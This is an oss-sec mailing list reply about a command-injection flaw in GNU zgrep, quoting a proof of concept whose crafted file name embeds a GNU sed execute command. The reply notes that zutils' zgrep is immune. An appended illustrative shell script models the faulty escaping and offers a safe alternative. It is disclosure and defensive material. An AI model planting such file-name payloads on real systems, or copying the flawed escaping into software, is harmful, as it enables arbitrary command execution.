oss-sec mailing list archives

Re: zgrep, xzgrep: arbitrary-file-write vulnerability


From: Axel Beckert <abe () deuxchevaux org>
Date: Fri, 8 Apr 2022 11:18:12 +0200

Hi,

On Fri, Apr 08, 2022 at 10:23:29AM +0200, Jakub Wilk wrote:
> As mentioned in the xz patch, if you have GNU sed, you get not just file
> write, but direct code execution.

Ouch.

> PoC:
>
>    $ touch foo.gz
>    $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
>    $ zgrep foo *.gz
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    foo

JFTR, if you have replaced GNU's zgrep with zgrep from zutils
(https://www.nongnu.org/zutils/zutils.html; lets you use the z* tools
with many compression formats, also mixed in a single command), then
this exploit does not work:

abe@c6:~/tmp/zgrep-PoC $ touch foo.gz
abe@c6:~/tmp/zgrep-PoC $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
abe@c6:~/tmp/zgrep-PoC $ zgrep foo *.gz
|
;e cowsay pwned
#.gz:foo
abe@c6:~/tmp/zgrep-PoC $ zgrep.gzip foo *.gz
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
foo
abe@c6:~/tmp/zgrep-PoC $ dpkg -S /bin/zgrep
diversion by zutils from: /bin/zgrep
diversion by zutils to: /bin/zgrep.gzip
gzip, zutils: /bin/zgrep
abe@c6:~/tmp/zgrep-PoC

                Kind regards, Axel
-- 
PGP: 2FF9CD59612616B5      /~\  Plain Text Ribbon Campaign, http://arc.pasp.de/
Mail: abe () deuxchevaux org  \ /  Say No to HTML in E-Mail and Usenet
Mail+Jabber: abe () noone org  X
https://axel.beckert.ch/   / \  I love long mails: https://email.is-not-s.ms/
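Added example, not code from the thread, from gzip or from zutils: a small POSIX shell script that models how a file name ends up inside the sed program zgrep builds to prefix each match with "name:", and beside it a prefixer that treats the name as data. The escaping in escape_for_sed_vulnerable is modelled on the pre-fix zgrep logic as I understand it (an assumption, not gzip's code verbatim): "$!N" appends at most one following line and the "$s" commands run only on the last line, so a name with two or more embedded newlines reaches the sed program partly unescaped and still multi-line; its second line is then parsed as a fresh sed command, and "e" is GNU sed's execute command. The generated program is only printed, never run. All function names are my own.

```sh
#!/bin/sh
# Added example, not code from gzip, zutils or the thread. Models how a
# file name ends up inside the sed program zgrep builds to prefix each
# match with "name:", and shows a prefixer that keeps the name as data.

# Assumption: pre-fix zgrep escaped the name with a sed script of this
# shape. "$!N" appends at most the *next* line, and the "$s" commands run
# only when the last input line is in the pattern space, so a name with two
# or more embedded newlines is emitted partly unescaped and still multi-line.
escape_for_sed_vulnerable() {
  printf '%s\n' "$1" | sed '
    $!N
    $s/[&\|]/\\&/g
    $s/\n/\\n/g
  '
}

# The sed program that would then be run over grep's output. It is printed,
# never executed here: with the PoC name its second line is ";e cowsay pwned",
# which GNU sed parses as the "e" (execute) command.
vulnerable_sed_script() {
  esc=$(escape_for_sed_vulnerable "$1")
  printf 's|^[^\\n]*|%s:&|\n' "$esc"
}

# Number of lines in a generated program; anything above 1 means the file
# name broke out of the single "s" command.
count_lines() {
  printf '%s\n' "$1" | awk 'END { print NR }'
}

# Safe alternative: never splice the name into a program. The name is an
# argument and each output line is built with printf, so a name containing
# newlines or sed metacharacters is just printed, as zutils does above.
# (Expects newline-terminated input, which is what grep produces.)
prefix_lines_safely() {
  while IFS= read -r line; do
    printf '%s:%s\n' "$1" "$line"
  done
}

# Triage check for a directory you are about to run z* tools in: count files
# whose *name* contains a newline. Such names are rare and worth a look.
count_newline_names() {
  nl='
'
  find "$1" -name "*${nl}*" -exec echo x \; | awk 'END { print NR }'
}

POC_NAME=$(printf '|\n;e cowsay pwned\n#.gz')   # the file name from the PoC

printf 'sed program the old escaping would build for the PoC name:\n%s\n\n' \
  "$(vulnerable_sed_script "$POC_NAME")"
printf 'same name, prefixing done without sed:\n%s\n' \
  "$(printf 'foo\n' | prefix_lines_safely "$POC_NAME")"
```

Run it as-is; it touches no files and calls no grep. A one-line or two-line name (try 'a|b.gz' or "$(printf 'a\nb.gz')") still yields a single-line sed program, which is why the PoC needs the third line "#.gz": it is that line's predecessor, ";e cowsay pwned", that lands at the start of a line inside the program.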
